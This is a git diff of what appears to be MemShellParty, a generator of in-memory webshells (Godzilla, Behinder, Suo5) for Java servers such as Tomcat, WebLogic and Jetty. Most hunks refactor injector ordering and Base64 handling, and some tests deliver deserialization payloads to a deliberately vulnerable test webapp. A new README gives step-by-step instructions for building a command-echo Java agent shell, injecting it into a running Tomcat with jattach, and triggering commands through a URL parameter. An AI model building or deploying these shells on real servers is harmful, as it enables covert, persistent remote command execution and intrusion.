.replace("{{base64Str}}", Base64.getEncoder().encodeToString(CommonUtil.gzipCompress(generateResult.getInjectorBytes()))); } } \ No newline at end of file diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/server/ApusicShell.java b/generator/src/main/java/com/reajason/javaweb/memshell/server/ApusicShell.java index 0488c3de..9755da11 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/server/ApusicShell.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/server/ApusicShell.java @@ -30,8 +30,9 @@ public Class getListenerInterceptor() { @Override public InjectorMapping getShellInjectorMapping() { return InjectorMapping.builder() - .addInjector(SERVLET, ApusicServletInjector.class) + .addInjector(LISTENER, ApusicListenerInjector.class) .addInjector(FILTER, ApusicFilterInjector.class) - .addInjector(LISTENER, ApusicListenerInjector.class).build(); + .addInjector(SERVLET, ApusicServletInjector.class) + .build(); } } diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/server/BesShell.java b/generator/src/main/java/com/reajason/javaweb/memshell/server/BesShell.java index e9d22373..c42537a5 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/server/BesShell.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/server/BesShell.java @@ -18,8 +18,8 @@ public Class getListenerInterceptor() { @Override public InjectorMapping getShellInjectorMapping() { return InjectorMapping.builder() - .addInjector(FILTER, BesFilterInjector.class) .addInjector(LISTENER, BesListenerInjector.class) + .addInjector(FILTER, BesFilterInjector.class) .addInjector(VALVE, BesValveInjector.class) .addInjector(AGENT_FILTER_CHAIN, BesFilterChainAgentInjector.class) .addInjector(AGENT_FILTER_CHAIN_ASM, BesFilterChainAgentWithAsmInjector.class) diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/server/GlassFishShell.java b/generator/src/main/java/com/reajason/javaweb/memshell/server/GlassFishShell.java index a3d8aa8d..dcbc4c76 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/server/GlassFishShell.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/server/GlassFishShell.java @@ -44,10 +44,10 @@ public Class getListenerInterceptor() { @Override public InjectorMapping getShellInjectorMapping() { return InjectorMapping.builder() - .addInjector(FILTER, GlassFishFilterInjector.class) - .addInjector(JAKARTA_FILTER, GlassFishFilterInjector.class) .addInjector(LISTENER, GlassFishListenerInjector.class) .addInjector(JAKARTA_LISTENER, GlassFishListenerInjector.class) + .addInjector(FILTER, GlassFishFilterInjector.class) + .addInjector(JAKARTA_FILTER, GlassFishFilterInjector.class) .addInjector(VALVE, GlassFishValveInjector.class) .addInjector(JAKARTA_VALVE, GlassFishValveInjector.class) .addInjector(AGENT_FILTER_CHAIN, TomcatFilterChainAgentInjector.class) diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/server/InforSuiteShell.java b/generator/src/main/java/com/reajason/javaweb/memshell/server/InforSuiteShell.java index 449678a7..e2ff683a 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/server/InforSuiteShell.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/server/InforSuiteShell.java @@ -24,10 +24,10 @@ public Class getListenerInterceptor() { @Override public InjectorMapping getShellInjectorMapping() { return InjectorMapping.builder() - .addInjector(FILTER, InforSuiteFilterInjector.class) - .addInjector(JAKARTA_FILTER, InforSuiteFilterInjector.class) .addInjector(LISTENER, GlassFishListenerInjector.class) .addInjector(JAKARTA_LISTENER, GlassFishListenerInjector.class) + .addInjector(FILTER, InforSuiteFilterInjector.class) + .addInjector(JAKARTA_FILTER, InforSuiteFilterInjector.class) .addInjector(VALVE, GlassFishValveInjector.class) .addInjector(JAKARTA_VALVE, GlassFishValveInjector.class) .addInjector(AGENT_FILTER_CHAIN, TomcatFilterChainAgentInjector.class) diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/server/JbossShell.java b/generator/src/main/java/com/reajason/javaweb/memshell/server/JbossShell.java index 7ac7ff04..86498c4a 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/server/JbossShell.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/server/JbossShell.java @@ -24,8 +24,8 @@ public Class getListenerInterceptor() { @Override public InjectorMapping getShellInjectorMapping() { return InjectorMapping.builder() - .addInjector(FILTER, JbossFilterInjector.class) .addInjector(LISTENER, JbossListenerInjector.class) + .addInjector(FILTER, JbossFilterInjector.class) .addInjector(VALVE, JbossValveInjector.class) .addInjector(AGENT_FILTER_CHAIN, TomcatFilterChainAgentInjector.class) .addInjector(AGENT_FILTER_CHAIN_ASM, TomcatFilterChainAgentWithAsmInjector.class) diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/server/JettyShell.java b/generator/src/main/java/com/reajason/javaweb/memshell/server/JettyShell.java index b5c1ef57..9ca6e28b 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/server/JettyShell.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/server/JettyShell.java @@ -33,12 +33,12 @@ public Class getListenerInterceptor() { @Override public InjectorMapping getShellInjectorMapping() { return InjectorMapping.builder() - .addInjector(SERVLET, JettyServletInjector.class) - .addInjector(JAKARTA_SERVLET, JettyServletInjector.class) - .addInjector(FILTER, JettyFilterInjector.class) - .addInjector(JAKARTA_FILTER, JettyFilterInjector.class) .addInjector(LISTENER, JettyListenerInjector.class) .addInjector(JAKARTA_LISTENER, JettyListenerInjector.class) + .addInjector(FILTER, JettyFilterInjector.class) + .addInjector(JAKARTA_FILTER, JettyFilterInjector.class) + .addInjector(SERVLET, JettyServletInjector.class) + .addInjector(JAKARTA_SERVLET, JettyServletInjector.class) .addInjector(JETTY_AGENT_HANDLER, JettyHandlerAgentInjector.class) .addInjector(JETTY_AGENT_HANDLER_ASM, JettyHandlerAgentWithAsmInjector.class) .build(); diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/server/ResinShell.java b/generator/src/main/java/com/reajason/javaweb/memshell/server/ResinShell.java index c7fb4d3f..67d06b98 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/server/ResinShell.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/server/ResinShell.java @@ -28,9 +28,9 @@ public Class getListenerInterceptor() { @Override public InjectorMapping getShellInjectorMapping() { return InjectorMapping.builder() - .addInjector(SERVLET, ResinServletInjector.class) - .addInjector(FILTER, ResinFilterInjector.class) .addInjector(LISTENER, ResinListenerInjector.class) + .addInjector(FILTER, ResinFilterInjector.class) + .addInjector(SERVLET, ResinServletInjector.class) .addInjector(AGENT_FILTER_CHAIN, ResinFilterChainAgentInjector.class) .addInjector(AGENT_FILTER_CHAIN_ASM, ResinFilterChainAgentWithAsmInjector.class) .build(); diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/server/ServerToolRegistry.java b/generator/src/main/java/com/reajason/javaweb/memshell/server/ServerToolRegistry.java index 766fff7d..34dcaffc 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/server/ServerToolRegistry.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/server/ServerToolRegistry.java @@ -23,12 +23,11 @@ public static void addToolMapping(ShellTool shellTool, ToolMapping toolMapping) Set injectorSupportedShellTypes = shellInjectorMapping.getSupportedShellTypes(); ToolMapping.ToolMappingBuilder toolMappingBuilder = ToolMapping.builder(); - for (Map.Entry> entry : rawToolMapping.entrySet()) { - String shellType = entry.getKey(); - if (!injectorSupportedShellTypes.contains(shellType)) { + for (String shellType : injectorSupportedShellTypes) { + Class shellClass = rawToolMapping.get(shellType); + if (shellClass == null) { continue; } - Class shellClass = entry.getValue(); if (ShellType.LISTENER.equals(shellType) || ShellType.JAKARTA_LISTENER.equals(shellType)) { shellClass = ListenerGenerator.generateListenerShellClass(shell.getListenerInterceptor(), shellClass); diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/server/SpringWebFluxShell.java b/generator/src/main/java/com/reajason/javaweb/memshell/server/SpringWebFluxShell.java index 3aa983c0..bfb87f95 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/server/SpringWebFluxShell.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/server/SpringWebFluxShell.java @@ -17,9 +17,9 @@ public class SpringWebFluxShell extends AbstractShell { public InjectorMapping getShellInjectorMapping() { return InjectorMapping.builder() .addInjector(SPRING_WEBFLUX_WEB_FILTER, SpringWebFluxWebFilterInjector.class) + .addInjector(NETTY_HANDLER, SpringWebFluxNettyHandlerInjector.class) .addInjector(SPRING_WEBFLUX_HANDLER_METHOD, SpringWebFluxHandlerMethodInjector.class) .addInjector(SPRING_WEBFLUX_HANDLER_FUNCTION, SpringWebFluxHandlerFunctionInjector.class) - .addInjector(NETTY_HANDLER, SpringWebFluxNettyHandlerInjector.class) .build(); } } diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/server/TomcatShell.java b/generator/src/main/java/com/reajason/javaweb/memshell/server/TomcatShell.java index 08493e1a..2cd30b6b 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/server/TomcatShell.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/server/TomcatShell.java @@ -33,14 +33,14 @@ public Class getListenerInterceptor() { @Override public InjectorMapping getShellInjectorMapping() { return InjectorMapping.builder() - .addInjector(SERVLET, TomcatServletInjector.class) - .addInjector(JAKARTA_SERVLET, TomcatServletInjector.class) - .addInjector(FILTER, TomcatFilterInjector.class) - .addInjector(JAKARTA_FILTER, TomcatFilterInjector.class) .addInjector(LISTENER, TomcatListenerInjector.class) .addInjector(JAKARTA_LISTENER, TomcatListenerInjector.class) + .addInjector(FILTER, TomcatFilterInjector.class) + .addInjector(JAKARTA_FILTER, TomcatFilterInjector.class) .addInjector(VALVE, TomcatValveInjector.class) .addInjector(JAKARTA_VALVE, TomcatValveInjector.class) + .addInjector(SERVLET, TomcatServletInjector.class) + .addInjector(JAKARTA_SERVLET, TomcatServletInjector.class) .addInjector(AGENT_FILTER_CHAIN, TomcatFilterChainAgentInjector.class) .addInjector(AGENT_FILTER_CHAIN_ASM, TomcatFilterChainAgentWithAsmInjector.class) .addInjector(CATALINA_AGENT_CONTEXT_VALVE, TomcatContextValveAgentInjector.class) diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/server/TongWeb6Shell.java b/generator/src/main/java/com/reajason/javaweb/memshell/server/TongWeb6Shell.java index 0b6dc537..b5eebad2 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/server/TongWeb6Shell.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/server/TongWeb6Shell.java @@ -18,10 +18,10 @@ public Class getListenerInterceptor() { @Override public InjectorMapping getShellInjectorMapping() { return InjectorMapping.builder() - .addInjector(FILTER, TongWebFilterInjector.class) - .addInjector(JAKARTA_FILTER, TongWebFilterInjector.class) .addInjector(LISTENER, TongWebListenerInjector.class) .addInjector(JAKARTA_LISTENER, TongWebListenerInjector.class) + .addInjector(FILTER, TongWebFilterInjector.class) + .addInjector(JAKARTA_FILTER, TongWebFilterInjector.class) .addInjector(VALVE, TongWebValveInjector.class) .addInjector(JAKARTA_VALVE, TongWebValveInjector.class) .addInjector(AGENT_FILTER_CHAIN, TongWebFilterChainAgentInjector.class) diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/server/TongWeb7Shell.java b/generator/src/main/java/com/reajason/javaweb/memshell/server/TongWeb7Shell.java index 3f8b885c..9b4a581f 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/server/TongWeb7Shell.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/server/TongWeb7Shell.java @@ -18,10 +18,10 @@ public Class getListenerInterceptor() { @Override public InjectorMapping getShellInjectorMapping() { return InjectorMapping.builder() - .addInjector(FILTER, TongWebFilterInjector.class) - .addInjector(JAKARTA_FILTER, TongWebFilterInjector.class) .addInjector(LISTENER, TongWebListenerInjector.class) .addInjector(JAKARTA_LISTENER, TongWebListenerInjector.class) + .addInjector(FILTER, TongWebFilterInjector.class) + .addInjector(JAKARTA_FILTER, TongWebFilterInjector.class) .addInjector(VALVE, TongWebValveInjector.class) .addInjector(JAKARTA_VALVE, TongWebValveInjector.class) .addInjector(AGENT_FILTER_CHAIN, TongWebFilterChainAgentInjector.class) diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/server/UndertowShell.java b/generator/src/main/java/com/reajason/javaweb/memshell/server/UndertowShell.java index c032b68c..1e16a590 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/server/UndertowShell.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/server/UndertowShell.java @@ -38,12 +38,12 @@ public Class getListenerInterceptor() { @Override public InjectorMapping getShellInjectorMapping() { return InjectorMapping.builder() - .addInjector(SERVLET, UndertowServletInjector.class) - .addInjector(JAKARTA_SERVLET, UndertowServletInjector.class) - .addInjector(FILTER, UndertowFilterInjector.class) - .addInjector(JAKARTA_FILTER, UndertowFilterInjector.class) .addInjector(LISTENER, UndertowListenerInjector.class) .addInjector(JAKARTA_LISTENER, UndertowListenerInjector.class) + .addInjector(FILTER, UndertowFilterInjector.class) + .addInjector(JAKARTA_FILTER, UndertowFilterInjector.class) + .addInjector(SERVLET, UndertowServletInjector.class) + .addInjector(JAKARTA_SERVLET, UndertowServletInjector.class) .addInjector(UNDERTOW_AGENT_SERVLET_HANDLER, UndertowServletInitialHandlerAgentInjector.class) .addInjector(UNDERTOW_AGENT_SERVLET_HANDLER_ASM, UndertowServletInitialHandlerAgentWithAsmInjector.class) .build(); diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/server/WebLogicShell.java b/generator/src/main/java/com/reajason/javaweb/memshell/server/WebLogicShell.java index e15cd11b..acd24ff2 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/server/WebLogicShell.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/server/WebLogicShell.java @@ -18,9 +18,9 @@ public Class getListenerInterceptor() { @Override public InjectorMapping getShellInjectorMapping() { return InjectorMapping.builder() - .addInjector(SERVLET, WebLogicServletInjector.class) - .addInjector(FILTER, WebLogicFilterInjector.class) .addInjector(LISTENER, WebLogicListenerInjector.class) + .addInjector(FILTER, WebLogicFilterInjector.class) + .addInjector(SERVLET, WebLogicServletInjector.class) .addInjector(WEBLOGIC_AGENT_SERVLET_CONTEXT, WebLogicServletContextAgentInjector.class) .addInjector(WEBLOGIC_AGENT_SERVLET_CONTEXT_ASM, WebLogicServletContextAgentWithAsmInjector.class) .build(); diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/server/WebSphereShell.java b/generator/src/main/java/com/reajason/javaweb/memshell/server/WebSphereShell.java index c7b5a1f0..17852694 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/server/WebSphereShell.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/server/WebSphereShell.java @@ -29,9 +29,9 @@ public Class getListenerInterceptor() { @Override public InjectorMapping getShellInjectorMapping() { return InjectorMapping.builder() - .addInjector(SERVLET, WebSphereServletInjector.class) - .addInjector(FILTER, WebSphereFilterInjector.class) .addInjector(LISTENER, WebSphereListenerInjector.class) + .addInjector(FILTER, WebSphereFilterInjector.class) + .addInjector(SERVLET, WebSphereServletInjector.class) .addInjector(WAS_AGENT_FILTER_MANAGER, WebSphereFilterChainAgentInjector.class) .addInjector(WAS_AGENT_FILTER_MANAGER_ASM, WebSphereFilterChainAgentWithAsmInjector.class) .build(); diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/utils/DigestUtils.java b/generator/src/main/java/com/reajason/javaweb/memshell/utils/DigestUtils.java new file mode 100644 index 00000000..a132c87b --- /dev/null +++ b/generator/src/main/java/com/reajason/javaweb/memshell/utils/DigestUtils.java @@ -0,0 +1,30 @@ +package com.reajason.javaweb.memshell.utils; + +import java.security.MessageDigest; +import java.security.NoSuchAlgorithmException; + +/** + * @author ReaJason + * @since 2025/4/6 + */ +public class DigestUtils { + public static String md5Hex(String input) { + try { + MessageDigest md = MessageDigest.getInstance("MD5"); + byte[] hashBytes = md.digest(input.getBytes()); + + // Convert byte array to hex string + StringBuilder hexString = new StringBuilder(); + for (byte b : hashBytes) { + String hex = Integer.toHexString(0xff & b); + if (hex.length() == 1) { + hexString.append('0'); + } + hexString.append(hex); + } + return hexString.toString(); + } catch (NoSuchAlgorithmException e) { + throw new RuntimeException("MD5 algorithm not found", e); + } + } +} diff --git a/generator/src/test/java/com/reajason/javaweb/memshell/GeneratorMainTest.java b/generator/src/test/java/com/reajason/javaweb/memshell/GeneratorMainTest.java index 36a500ad..f8ff963d 100644 --- a/generator/src/test/java/com/reajason/javaweb/memshell/GeneratorMainTest.java +++ b/generator/src/test/java/com/reajason/javaweb/memshell/GeneratorMainTest.java @@ -49,7 +49,7 @@ void test() { if (generateResult != null) { Files.write(Paths.get(generateResult.getInjectorClassName() + ".class"), generateResult.getInjectorBytes(), StandardOpenOption.CREATE_NEW); Files.write(Paths.get(generateResult.getShellClassName() + ".class"), generateResult.getShellBytes(), StandardOpenOption.CREATE_NEW); -// System.out.println(Base64.encodeBase64String(generateResult.getInjectorBytes())); +// System.out.println(Base64.getEncoder().encodeToString(generateResult.getInjectorBytes())); // System.out.println(Packers.ScriptEngine.getInstance().pack(generateResult)); // Files.write(Path.of("target.jar"), Packer.INSTANCE.AgentJar.getPacker().packBytes(generateResult)); } diff --git a/generator/src/test/java/com/reajason/javaweb/memshell/config/GodzillaShellConfigTest.java b/generator/src/test/java/com/reajason/javaweb/memshell/config/GodzillaShellConfigTest.java index 91bfd1da..6fc3db64 100644 --- a/generator/src/test/java/com/reajason/javaweb/memshell/config/GodzillaShellConfigTest.java +++ b/generator/src/test/java/com/reajason/javaweb/memshell/config/GodzillaShellConfigTest.java @@ -2,7 +2,7 @@ import org.junit.jupiter.api.Test; -import static org.junit.jupiter.api.Assertions.assertEquals; +import static org.junit.jupiter.api.Assertions.*; /** * @author ReaJason @@ -14,6 +14,7 @@ class GodzillaShellConfigTest { void test() { GodzillaConfig shellConfig = GodzillaConfig.builder() .pass("pass").build(); - assertEquals("key", shellConfig.getKey()); + assertEquals("pass", shellConfig.getPass()); + assertNotEquals("key", shellConfig.getKey()); } } \ No newline at end of file diff --git a/generator/src/test/java/com/reajason/javaweb/memshell/generator/CustomShellGeneratorTest.java b/generator/src/test/java/com/reajason/javaweb/memshell/generator/CustomShellGeneratorTest.java index 570441f3..c5e52fe8 100644 --- a/generator/src/test/java/com/reajason/javaweb/memshell/generator/CustomShellGeneratorTest.java +++ b/generator/src/test/java/com/reajason/javaweb/memshell/generator/CustomShellGeneratorTest.java @@ -6,7 +6,7 @@ import lombok.SneakyThrows; import net.bytebuddy.ByteBuddy; import net.bytebuddy.jar.asm.ClassReader; -import org.apache.commons.codec.binary.Base64; +import java.util.Base64;; import org.junit.jupiter.api.Test; import static org.junit.jupiter.api.Assertions.assertEquals; @@ -24,7 +24,7 @@ void test() { .subclass(Object.class) .name(CommonUtil.generateShellClassName()).make().getBytes(); String className = CommonUtil.generateShellClassName(); - byte[] bytes1 = new CustomShellGenerator(ShellConfig.builder().build(), CustomConfig.builder().shellClassName(className).shellClassBase64(Base64.encodeBase64String(bytes)).build()).getBytes(); + byte[] bytes1 = new CustomShellGenerator(ShellConfig.builder().build(), CustomConfig.builder().shellClassName(className).shellClassBase64(Base64.getEncoder().encodeToString(bytes)).build()).getBytes(); ClassReader classReader = new ClassReader(bytes1); assertEquals(className, classReader.getClassName().replace("/", ".")); diff --git a/generator/src/test/java/com/reajason/javaweb/memshell/packer/BCELPackerTest.java b/generator/src/test/java/com/reajason/javaweb/memshell/packer/BCELPackerTest.java index 5b15b5c7..15197750 100644 --- a/generator/src/test/java/com/reajason/javaweb/memshell/packer/BCELPackerTest.java +++ b/generator/src/test/java/com/reajason/javaweb/memshell/packer/BCELPackerTest.java @@ -1,7 +1,7 @@ package com.reajason.javaweb.memshell.packer; import com.reajason.javaweb.memshell.config.GenerateResult; -import org.apache.commons.codec.binary.Base64; +import java.util.Base64;; import org.junit.jupiter.api.Test; /** @@ -13,7 +13,7 @@ class BCELPackerTest { @Test void test() { - byte[] bytes1 = Base64.decodeBase64(""); + byte[] bytes1 = Base64.getDecoder().decode(""); GenerateResult generateResult = GenerateResult.builder() .injectorBytes(bytes1).build(); String pack = packer.pack(generateResult); diff --git a/generator/src/test/java/com/reajason/javaweb/memshell/packer/GzipBase64Test.java b/generator/src/test/java/com/reajason/javaweb/memshell/packer/GzipBase64Test.java index 7f872dcb..7ec5fb9f 100644 --- a/generator/src/test/java/com/reajason/javaweb/memshell/packer/GzipBase64Test.java +++ b/generator/src/test/java/com/reajason/javaweb/memshell/packer/GzipBase64Test.java @@ -4,7 +4,7 @@ import com.reajason.javaweb.memshell.packer.base64.GzipBase64Packer; import com.reajason.javaweb.memshell.utils.CommonUtil; import lombok.SneakyThrows; -import org.apache.commons.codec.binary.Base64; +import java.util.Base64;; import org.junit.jupiter.api.Test; import static org.junit.jupiter.api.Assertions.assertEquals; @@ -21,6 +21,6 @@ void compress() { GenerateResult generateResult = new GenerateResult(); generateResult.setInjectorBytes("hello world".getBytes()); String pack = new GzipBase64Packer().pack(generateResult); - assertEquals("hello world", new String(CommonUtil.gzipDecompress(Base64.decodeBase64(pack)))); + assertEquals("hello world", new String(CommonUtil.gzipDecompress(Base64.getDecoder().decode(pack)))); } } \ No newline at end of file diff --git a/generator/src/test/java/com/reajason/javaweb/memshell/shelltool/command/CommandFilterChainASMTest.java b/generator/src/test/java/com/reajason/javaweb/memshell/shelltool/command/CommandFilterChainASMTest.java index a1e6be92..35743647 100644 --- a/generator/src/test/java/com/reajason/javaweb/memshell/shelltool/command/CommandFilterChainASMTest.java +++ b/generator/src/test/java/com/reajason/javaweb/memshell/shelltool/command/CommandFilterChainASMTest.java @@ -6,9 +6,6 @@ import com.reajason.javaweb.memshell.shelltool.TestFilterChain; import com.reajason.javaweb.util.ClassUtils; import lombok.SneakyThrows; -import me.n1ar4.clazz.obfuscator.api.ClassObf; -import me.n1ar4.clazz.obfuscator.api.Result; -import me.n1ar4.clazz.obfuscator.config.BaseConfig; import org.apache.commons.io.IOUtils; import org.junit.jupiter.api.BeforeEach; import org.junit.jupiter.api.Test; @@ -65,15 +62,6 @@ public MethodVisitor visitMethod(int access, String name, String descriptor, }; cr.accept(cv, ClassReader.EXPAND_FRAMES); byte[] bytes2 = ClassRenameUtils.renameClass(cw.toByteArray(), TestFilterChain.class.getName() + "Asm"); - BaseConfig config = BaseConfig.Default(); - config.setIgnorePublic(true); - config.setEnableMethodName(false); - config.setEnableParamName(false); - config.setEnableAES(false); - config.setEnableAdvanceString(false); - ClassObf classObf = new ClassObf(config); - Result run = classObf.run(bytes2); - bytes2 = run.getData(); IOUtils.write(bytes2, new FileOutputStream(new File("godzilla2.class"))); Class clazz = ClassUtils.defineClass(bytes2); instance = spy(clazz.newInstance()); diff --git a/integration-test/build.gradle b/integration-test/build.gradle index 01ec0eca..5f160502 100644 --- a/integration-test/build.gradle +++ b/integration-test/build.gradle @@ -1,13 +1,9 @@ -plugins { - id "io.freefair.lombok" version "8.11" -} - -group = 'com.reajason.javaweb' +group = 'io.github.reajason' version = rootProject.version dependencies { testImplementation project(":vul:vul-webapp") - testImplementation project(":common") + testImplementation project(":memshell-party-common") testImplementation project(":tools:behinder") testImplementation project(":tools:godzilla") testImplementation project(":tools:suo5") @@ -18,11 +14,9 @@ dependencies { testImplementation 'javax.servlet:javax.servlet-api' testImplementation 'javax.websocket:javax.websocket-api' - testImplementation 'jakarta.servlet:jakarta.servlet-api' testImplementation 'org.java-websocket:Java-WebSocket' testImplementation 'com.squareup.okhttp3:okhttp' - testImplementation 'com.alibaba.fastjson2:fastjson2' testImplementation 'org.slf4j:slf4j-simple:2.0.16' testImplementation platform('org.junit:junit-bom') diff --git a/integration-test/src/test/java/com/reajason/javaweb/integration/ShellAssertionTool.java b/integration-test/src/test/java/com/reajason/javaweb/integration/ShellAssertionTool.java index 179b7287..04cb9726 100644 --- a/integration-test/src/test/java/com/reajason/javaweb/integration/ShellAssertionTool.java +++ b/integration-test/src/test/java/com/reajason/javaweb/integration/ShellAssertionTool.java @@ -232,16 +232,8 @@ public static GenerateResult generate(String urlPattern, Server server, String s .targetJreVersion(targetJdkVersion) .debug(true) .shrink(true) - .obfuscate(true) .build(); - if (ShellTool.NeoreGeorg.equals(shellTool)) { - shellConfig.setObfuscate(false); - } - if (Server.Jetty.equals(server) && ShellType.FILTER.equals(shellType) && ShellTool.Suo5.equals(shellTool)) { - shellConfig.setObfuscate(false); - } - ShellToolConfig shellToolConfig = null; String uniqueName = shellTool + RandomStringUtils.randomAlphabetic(5) + shellType + RandomStringUtils.randomAlphabetic(5) + packer.name(); switch (shellTool) { @@ -332,6 +324,8 @@ public static void assertInjectIsOk(String url, String shellType, ShellTool shel case JavaCommonsBeanutils18 -> VulTool.postData(url + "/java_deserialize/cb183", content); case JavaCommonsBeanutils19 -> VulTool.postData(url + "/java_deserialize/cb194", content); case JavaCommonsBeanutils110 -> VulTool.postData(url + "/java_deserialize/cb110", content); + case JavaCommonsCollections3 -> VulTool.postData(url + "/java_deserialize/cc321", content); + case JavaCommonsCollections4 -> VulTool.postData(url + "/java_deserialize/cc40", content); case HessianDeserialize -> VulTool.postData(url + "/hessian", content); case Hessian2Deserialize -> VulTool.postData(url + "/hessian2", content); case Base64 -> VulTool.postData(url + "/b64", content); diff --git a/integration-test/src/test/java/com/reajason/javaweb/integration/tomcat/Tomcat8DeserializeContainerTest.java b/integration-test/src/test/java/com/reajason/javaweb/integration/tomcat/Tomcat8DeserializeContainerTest.java index 9a799f64..f41e6892 100644 --- a/integration-test/src/test/java/com/reajason/javaweb/integration/tomcat/Tomcat8DeserializeContainerTest.java +++ b/integration-test/src/test/java/com/reajason/javaweb/integration/tomcat/Tomcat8DeserializeContainerTest.java @@ -47,6 +47,8 @@ static Stream casesProvider() { arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.JavaCommonsBeanutils18), arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.JavaCommonsBeanutils19), arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.JavaCommonsBeanutils110), + arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.JavaCommonsCollections3), + arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.JavaCommonsCollections4), arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.HessianDeserialize), arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.Hessian2Deserialize) ); diff --git a/memshell-agent/README.md b/memshell-agent/README.md new file mode 100644 index 00000000..9d45b518 --- /dev/null +++ b/memshell-agent/README.md @@ -0,0 +1,65 @@ +## Agent 内存马 + +### 实现原理 + +JDK1.5 提供了 JVMTI 接口供开发者扩展以查看 JVM 状态,或控制 JVM 代码执行。其中最重要的就是 `java.lang.instrument`,可以添加自定义的 +Transformer,来进行字节码修改。具体细节可查看 [JVM 源码分析之 javaagent 原理完全解读](https://www.infoq.cn/article/javaagent-illustrated)。 + +JavaAgent 有两种入口: + +1. 静态注入,MANIFEST 定义 Premain-Class 属性指定实现类,并且类中实现了 + `public static void premain(String args, Instrumentation inst)` 方法,在 Java 程序运行参数中添加 + `java -javaanget:/path/to/agent.jar -jar app.jar`,应用启动时,就会调用到 `premain` 方法执行字节码增强相关代码逻辑。 +2. 动态注入,MANIFEST 定义 Agent-Class 属性指定实现类,并且类中实现了 + `public static void agentmain(String args, Instrumentation inst)` 方法,在 Java 程序运行过程中,通过 attach 机制进行 + attach 时,会调用到 `agentmain` 方法执行字节码增强相关代码逻辑。 + +当一个 jar 包中 MANIFEST 定义如下时: + +```text +Premain-Class: com.reajason.javaweb.memshell.agent.CommandFilterChainTransformer +Agent-Class: com.reajason.javaweb.memshell.agent.CommandFilterChainTransformer +Can-Redefine-Classes: true +Can-Retransform-Classes: true +Can-Set-Native-Method-Prefix: true +``` + +那么这个 Java Agent 既支持静态注入,也支持动态注入。 + +### 实现方式 + +> 目前提供了 Tomcat 最简单的命令回显 Agent 内存马实现方式 + +1. 基于 + ASM,[CommandFilterChainTransformer.java](memshell-agent-asm/src/main/java/com/reajason/javaweb/memshell/agent/CommandFilterChainTransformer.java) +2. 基于 + Javassist,[CommandFilterChainTransformer.java](memshell-agent-javassist/src/main/java/com/reajason/javaweb/memshell/agent/CommandFilterChainTransformer.java) +3. 基于 + ByteBuddy,[CommandFilterChainTransformer.java](memshell-agent-bytebuddy/src/main/java/com/reajason/javaweb/memshell/agent/CommandFilterChainTransformer.java) + +### 如何使用 + +可以直接 IDEA 中的 Gradle,里面双击 memshell-agent 下的 Tasks 中 build 下的 jar 进行构建。 + +```bash +## 进入项目根目录 +cd MemShellParty + +## MacOs or Linux +./gradlew :memshell-agent:jar + +## Windows +gradlew.bat :memshell-agent:jar +``` + +构建结束,会在每个模块 build/libs/ 下生成 Jar 包,其中带 all 的为我们所需要用的包,例如: + +- memshell-agent-asm/build/libs/memshell-agent-asm-1.0.0-all.jar +- memshell-agent-javassist/build/libs/memshell-agent-javassist-1.0.0-all.jar +- memshell-agent-bytebuddy/build/libs/memshell-agent-bytebuddy-1.0.0-all.jar + +下载 [jattach](https://github.com/jattach/jattach/releases/latest) 攻击实施动态注入。 + +1. 启动你需要注入的 Tomcat +2. 执行命令 `/path/to/jattach pid load instrument false /path/to/agent.jar`,注意,所有路径都使用绝对路径,不要使用相对路径 +3. 访问 `http://localhost:8080/app/?paramName=id` ,查看是否成功 \ No newline at end of file diff --git a/memshell-agent/memshell-agent-asm/build.gradle b/memshell-agent/memshell-agent-asm/build.gradle index df0d3a1e..90f0d23c 100644 --- a/memshell-agent/memshell-agent-asm/build.gradle +++ b/memshell-agent/memshell-agent-asm/build.gradle @@ -6,6 +6,10 @@ plugins { group = 'com.reajason.javaweb' version = '1.0.0' 